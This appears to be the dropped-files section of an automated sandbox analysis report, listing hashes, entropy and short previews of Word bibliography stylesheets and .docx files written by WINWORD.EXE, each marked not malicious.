                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                                                                                                                                                                                                                                          MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                                                                                                                                                                                                                                          SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):251032
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.102652100491927
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                                                                                                                                                                                                                                          MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                                                                                                                                                                                                                                          SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):284415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.00549404077789
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                                                                                                                                                                                                                                          MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                                                                                                                                                                                                                                          SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):294178
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.977758311135714
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                                                                                                                                                                                                                                                                                                                                          MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):270198
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.073814698282113
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprAiaR95vtfb8pDbgWPzDCvCmvQursq7vImej/yQ4SS1apSiQhHDOruvoVeMUX:We
                                                                                                                                                                                                                                                                                                                                                                          MD5:FF0E07EFF1333CDF9FC2523D323DD654
                                                                                                                                                                                                                                                                                                                                                                          SHA1:77A1AE0DD8DBC3FEE65DD6266F31E2A564D088A4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3F925E0CC1542F09DE1F99060899EAFB0042BB9682507C907173C392115A44B5
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B4615F995FAB87661C2DBE46625AA982215D7BDE27CAFAE221DCA76087FE76DA4B4A381943436FCAC1577CB3D260D0050B32B7B93E3EB07912494429F126BB3D
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):217137
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.068335381017074
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                                                                                                                                                                                                                                          MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                                                                                                                                                                                                                                          SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):254875
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.003842588822783
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                                                                                                                                                                                                                                                                                                          MD5:377B3E355414466F3E3861BCE1844976
                                                                                                                                                                                                                                                                                                                                                                          SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):344303
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.023195898304535
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                                                                                                                                                                                                                                          MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                                                                                                                                                                                                                                          SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):250983
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.057714239438731
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                                                                                                                                                                                                                                          MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                                                                                                                                                                                                                                          SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):51826
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.541375256745271
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                                                                                                                                                                                                                                          MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                                                                                                                                                                                                                                          SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):47296
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.42327948041841
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                                                                                                                                                                                                                                          MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                                                                                                                                                                                                                                          SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):34415
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.352974342178997
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                                                                                                                                                                                                                                          MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                                                                                                                                                                                                                                          SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):3465076
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.898517227646252
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                                                                                                                                                                                                                                          MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                                                                                                                                                                                                                                          SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                                                                                                                                                                                                                                          SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                                                                          Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|
                                                                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                                                                          Size (bytes):18
                                                                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.725480556997868
                                                                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                          SSDEEP:3:QRi54vl:QP9
                                                                                                                                                                                                                                                                                                                                                                          MD5:A5E51FDFAF429614FB5218AB559D299A
                                                                                                                                                                                                                                                                                                                                                                          SHA1:262EC76760BB9A83BCFF955C985E70820DF567AE
                                                                                                                                                                                                                                                                                                                                                                          SHA-256:3E82E9F60CE38815C28B0E5323268BDA212A84C3A9C7ACCC731360F998DF0240
